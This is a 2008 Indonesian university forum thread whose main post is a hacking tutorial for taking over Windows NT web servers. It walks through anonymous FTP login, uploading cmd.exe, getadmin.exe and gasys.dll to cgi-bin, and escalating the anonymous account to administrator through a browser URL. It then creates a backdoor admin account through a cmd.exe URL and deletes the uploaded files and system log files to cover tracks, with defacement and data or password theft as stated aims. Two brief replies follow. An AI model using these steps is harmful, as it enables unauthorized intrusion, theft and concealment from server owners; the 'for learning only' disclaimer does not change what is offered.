UNKLAB FORUM

Forum Mahasiswa & Alumni Universitas Klabat
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in
Bagi Guest atau user yang tidak terdaftar, mohon maaf karena ada beberapa thread tidak bisa diakses oleh guest, oleh karena itu, sebaiknya anda registrasi terlebih untuk bisa mengakses penuh forum ini. Baca dulu peraturan forum ini. Terima Kasih
Navigation
 Index
 Memberlist
 Profile
 FAQ
 Search
Search
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Lowongan Pekerjaan PT. PNM (Persero)
Wed Nov 08, 2017 7:01 pm by CLiFF

» .NET Programming
Tue Mar 15, 2011 6:49 pm by Marvin07

» Bagaimana Menginstal OS dari USB???
Thu Feb 10, 2011 9:55 pm by unaitech

» Automatic Installation BackTrack 3 Final | Dual Booting
Thu Feb 10, 2011 9:53 pm by unaitech

» simple hacking test
Thu Feb 10, 2011 7:38 pm by and213

» [tutor] How To Patch SQL Injection Bug
Thu Feb 10, 2011 9:52 am by unaitech

» what ur distro..?
Thu Feb 10, 2011 9:48 am by unaitech

» netcut source-code
Thu Feb 10, 2011 9:44 am by unaitech

» Ragnarok Online
Mon Jan 31, 2011 1:57 pm by Marvin07

FRIENDS
Ads

    No ads available.



    Share | 
     

     Teknik Menjadi Admin Pada Windows NT

    Go down 
    AuthorMessage
    CLiFF
    Administrator
    Administrator
    avatar

    Male Number of posts : 564
    Age : 32
    Location : Anywhere...
    Points : 10009
    Registration date : 2008-06-03

    PostSubject: Teknik Menjadi Admin Pada Windows NT   Tue Jul 29, 2008 9:04 am

    Karena banyaknya celah/kelemahan dari OS Windows, begitu banyak kalangan IT yang telah mengetahuinya selain mudah untuk di Crack sistem operasi ini juga sering menjadi santapan para Script Kiddies dan kabarnya lagi sistem operasi ini menjadi server favorite bagi para Hacker, karena sistem ini sangat gampang untuk dikerjain ( he.he..bukan berarti gue nyarankan lu semua jadi Cracker Very Happy:D)

    Seperti halnya kasus bug Unicode dan CodeRed yang telah menimbulkan bencana besar terhadap server yang berjalan pada sistem operasi windows diseluruh dunia. Maka para admin yang menjalankan sistemnya pada paltform windows ini menjadi kalang kabut bagaikan kambing kebakaran jenggot (mbeee.mbeee..mbeeeeee <-- aduh kacian nih..).
    Oke ini hanyalah gambaran dari kasus-kasus yang pernah melanda server yang menggunakan Platform Sistem Operasi windows.
    Sekarang marilah kita menjadi penguasa tunggal pada server windows NT, mau tahu caranya ?

    Tapi sebelumnya baca dulu yg ini

    Tujuan dari penulisan Artikel ini hanya untuk "PEMBELAJARAN SAJA"
    jadi
    " PENULIS TIDAK BERTANGGUNG JAWAB ATAS DAMPAK YANG DITIMBULKAN OLEH TUTORIAL INI "


    Adapun langkah-langkah persiapan melakukan Crack pada SO windows NT adalah sbb:
    ==========================
    1. Kamu harus memiliki PC (personal Computer) yang terkoneksi ke Internet.
    2. Sistem operasi yang digunakan sebaiknya menggunakan SO yang sama dengan korban ( OS Windows NT) kenapa harus menggunakan SO ini..? Karena dengan sistem ini nantinya kita akan gampang untuk mengupload file CMD.EXE dari PC kita dan file ini nantinya akan kita perlukan saat melakukan Crack.
    3. Tools-tools pendukung seperti program GetAdmin.exe dan Gasys.dll.
    4. Browser seperti IE , Netscape dan NeoPlanet ( NeoPlanet adalah Browser yang digunakan penulis).
    Oke setelah persiapan diatas terpenuhi sekarang kita akan melakukan tahap berikutnya yaitu tahap Cracking pada sistem operasi windows NT yang mana tujuan akhir kita adalah untuk mendapatkan password administratornya. Dimana dengan mendapatkan password dari admin ini maka kita akan dapat melakukan apa saja dengan server korban, seperti deface, pencurian data, pencurian password client, dll.
    Berikut adalah tahap-tahap dalam melakukan cracking .
    ============================================
    1.Jalankan MS-DOS prompt.
    2.Siapkan target yang ingin anda crack, anda dapat mencarinya dengan bantuan search engine seperti google, yahoo, exite, altavista, dan lain-lain. (penulis sendiri lebih senang menggunakan scan engine Operasi Sistem seperti netcraft ).
    3. Jalankan FTP anda dengan koneksi tujuan adalah server target dan alangkah baiknya bila anda memiliki program port scanner, karena kita akan mengetahui apakah terget kita akan menjalan kan servis FTP atau tidak. Dan dengan menggunakan program port scanner ini anda dengan mudah nantinya menentukan port-port berapa saja yang terbuka
    contoh beberapa port dan nama mesin pengunaan:
    ---------------------- ----------------------------------------------
    Port: Mesin yang bekerja:
    ====================
    21 ftp
    22 ssh
    23 telnet
    80 http
    ====================
    Contoh command dalam melakukan ftp :
    C:\ftp www.hvd-79.com maka ada pesan :
    Connected to www.hvd-79.com 220 medinet microsoft FTP
    Service (version 3.0)
    User(www.hvd-79.com : (none)): Anonymous (Enter)
    Anonymous accses allow, send identify (email name) as
    password:
    Koneksi ini menjelaskan bahwan nama NetBios dari server adalah medinet. Dan dari sini kita juga akan tahu nama account dari user adalah Anonymous yang digunakan oleh windows NT untuk menjalankan mesin seperti FTP, WWW dan Ghoper pada server tersebut.
    Bila saja admin sebelumnya belum pernah mengganti account default pada server tersebut, maka user account internet Anonymousnya adalah IUSR_SATURN.
    Sedangkan untuk passwordnya kita hanya perlu memasukan nama email kita atau bisa juga nama email yang kita ciptakan sendiri (coba aja admin@hvd-79.com).
    Setelah perintah diatas anda isi semua maka anda sudah diizinkan untuk login pada direktori FTP anda dan silahkan mencoba command cd, dir, untuk masuk dan melihat isi didalam suatu direktori sedangakan perintah put biasanya digunakan oleh para Cracker untuk mengupload atau meletakan trojan pada server korban.
    ==============================================
    Berikut ini saya sertakan juga daftar command yang bisa anda gunakan pada ftp:
    ==============================================
    ! delete literal prompt
    send
    ? debug ls put
    status
    append dir mdelete pwd
    trace
    ascii disconnect mdir quit
    type
    bell get mget quote
    user
    binary glob mkdir recv
    verbose
    bye hash mls remotehelp
    cd help mput rename
    close lcd open rmdir
    ===========================================
    Namun disini kita juga harus memahami bahwa tidak semua perintah ftp dapat anda gunakan seperti command "put" command ini pada umumnya dibatasi penggunaannya sebab si Admin yang pintar tidak akan mengijinkan accses write untuk user Anonymous dan bila ini kita paksakan maka hasilnya adalah " acces denied ". Terkadang disini admin yang kurang memperhatikan allow setting servernya maka kita akan dizinkan untuk mengupload file apa saja yang kita inginkan.
    Selanjutnya jika anda menemukan direktori cgi-bin maka ini adalah suatu keberuntungan. Segeralah masuk ke direktori cgi-bin tersebut dan siapkan file transfer tipe binary dan cobalah mengupload file CMD.EXE dari disk anda.
    Contoh perintahnya sebagai berikut:
    ============================
    ftplcd c:\winnt\system32\
    Local directory now C:\winnt\system32\.
    ftpput cmd.exe
    226 transfer complate
    208144 byte sent in 0,05 second (4639,7 byte/sec)
    Kemudian lakukan hal yang sama untuk mengupload file getadmin.exe dan gasys.dll pada direktori yang sama yaitu cgi-bin.
    ftplcd c:\winnt\system32\
    Local directory now C:\winnt\system32\.
    ftpput getadmin.exe
    226 transfer complate
    dan
    ftplcd c:\winnt\system32\
    Local directory now C:\winnt\system32\
    ftpput gasys.dll
    226 transfer complate
    Setelah semuanya selesai anda upload sekarang kita beralih ke browser dan ketikanlah link dibawah ini:
    http://www.hvd-79.com/cgi-bin/getadmin.exe?IUSR_MEDINET
    setelah beberapa menit kemudian akan muncul pesan cgi-error dan pada tampilan error tersebut terdapat tambahan :
    CGI-ERROR
    congratulation , now account IUSER_MEDINET have administrator rights.
    Nah sekarang ini artinya account Anonymous anda telah berpangakat sama dengan administartor lokal. Dengan demikian maka anda dapat melakukan apa saja terhadap server yang anda crack tersebut seperti yang saya contohkan tadi (melakukan deface, pencurian data, pencurian password client dll).
    Namun untuk menjaga account anda agar tetap awet maka anda saya sarankan untuk membuat accout sendiri , kamu bingung dan tak tahu caranya..? gampang kok..
    Untuk membuat account baru pada IE anda inilah contohnya :
    ===============================================
    Dimana contoh : User= ntbaruku dan Password = hvd-79 maka ketikanlah link anda seperti dibawah ini:
    http://www.hvd-79.com/ cgi-bin/ cmd.exe?/c+ c:\winnt\system32\net.exe+ ntbaruku+hvd-79+/add
    dan untuk membuat anda sebagai administrator ketiklah pada browser anda sebagai berikut :
    http://www.hvd-79.com/cgi-bin/getadmin.exe?ntbaruku
    Kemudian clik tombol start dan melalui find cari komputer dengan nama www.HvD-79.com setelah komputer tersebut ditemukan clik kanan mouse anda dan klick explore maka pada saat itu pula akan muncul pertanyaan untuk User dan Password maka isikanlah dengan ( ntbaruku dan hvd-79 ) sebagai user dan passwordnya.Dengan langkah ini maka anda telah menjadi admin benaran.
    Upss.. tapi anda jangan senang dulu masih ada pekerjaan yang sangat penting yang harus anda lakukan, pekerjaan apakah itu ? Menghilangkan jejak, ya bila anda ingin menjadi seorang hacker handal anda tidak boleh ceroboh karena setiap perintah yang anda ketikan tadi sewaktu melakukan cracking maka logfiles anda akan tertinggal disana dan ini akan membahayakan diri anda sendiri sebab nomor IP anda akan di rekam disana dan ini dapat dimamfaatkan kembali oleh Admin yang sesungguhnya untuk menuntut serta menangkap anda atas perbuatan penyusupan dan perusakan sistem mereka.
    Namun berhubung anda telah menjadi seorang Admin maka segeralah menghapus files-files yang tadi anda upload pada direktori cgi-bin yaitu file cmd.exe, getadmin.exe dan gasys.dll karena anda tidak membutuhkannya lagi.
    Tindakan penghapusan files-files tadi adalah untuk memastikan jejak anda tidak tertinggal disana yaitu adanya files (cmd.exe, getadmin.exe dan gasys.dll) pada direktori cgi-bin. Dan untuk menghilangkan seluruh logfiles anda yang tertinggal masuklah kedirektori winnt\system32\logfiles <-- segera hapus jejak anda yang tertinggal.
    Berikutnya kita juga dapat melakukan cracking dengan seluruh accout client yang tersimpan pada informasi SAM (security Account Manager) yang terdapat pada server target dengan menggunakan program seperti l0phtcrack namun karena keterbatasan waktu penulis hanya membahas sampai disini.
    Thanx to: HvD-79

    _________________
    Einstein said "The true definition of stupidity is to do the same thing time and again and expect a different outcome."





    http://unklab.forum.st/
    Back to top Go down
    View user profile http://unklab.forum.st
    y0ng_en9el
    Pro
    Pro


    Male Number of posts : 919
    Age : 33
    Location : In your heart
    Points : 78
    Registration date : 2008-06-10

    PostSubject: Re: Teknik Menjadi Admin Pada Windows NT   Sat Aug 23, 2008 5:40 pm

    Nice info Pak Admin Smile

    tp klo supaya lebe aman pake linux kayaknya cheers
    Back to top Go down
    View user profile http://hikari-community.co.nr
    bronkolous
    Newbie
    Newbie
    avatar

    Male Number of posts : 20
    Age : 32
    Location : in house
    Points : 0
    Registration date : 2008-10-04

    PostSubject: Re: Teknik Menjadi Admin Pada Windows NT   Sat Oct 04, 2008 4:40 pm

    coy linux tidak memungkinkan aman.. confused

    aman dari apa dulu ca..?
    Back to top Go down
    View user profile
    Sponsored content




    PostSubject: Re: Teknik Menjadi Admin Pada Windows NT   

    Back to top Go down
     
    Teknik Menjadi Admin Pada Windows NT
    Back to top 
    Page 1 of 1
     Similar topics
    -
    » GSS ADMIN AND MOD TEAM
    » Boarded up windows given a telephone number to ring in a dream it is real limousine hire
    » Conflict of interest vs USec Visperas
    » Retirement gift ideas
    » Dream of escaping a house through window

    Permissions in this forum:You cannot reply to topics in this forum
    UNKLAB FORUM :: KLABAT UNIVERSITY :: Computer Science Faculty :: Computer Security :: Hacking, Cracking, Etc.-
    Jump to: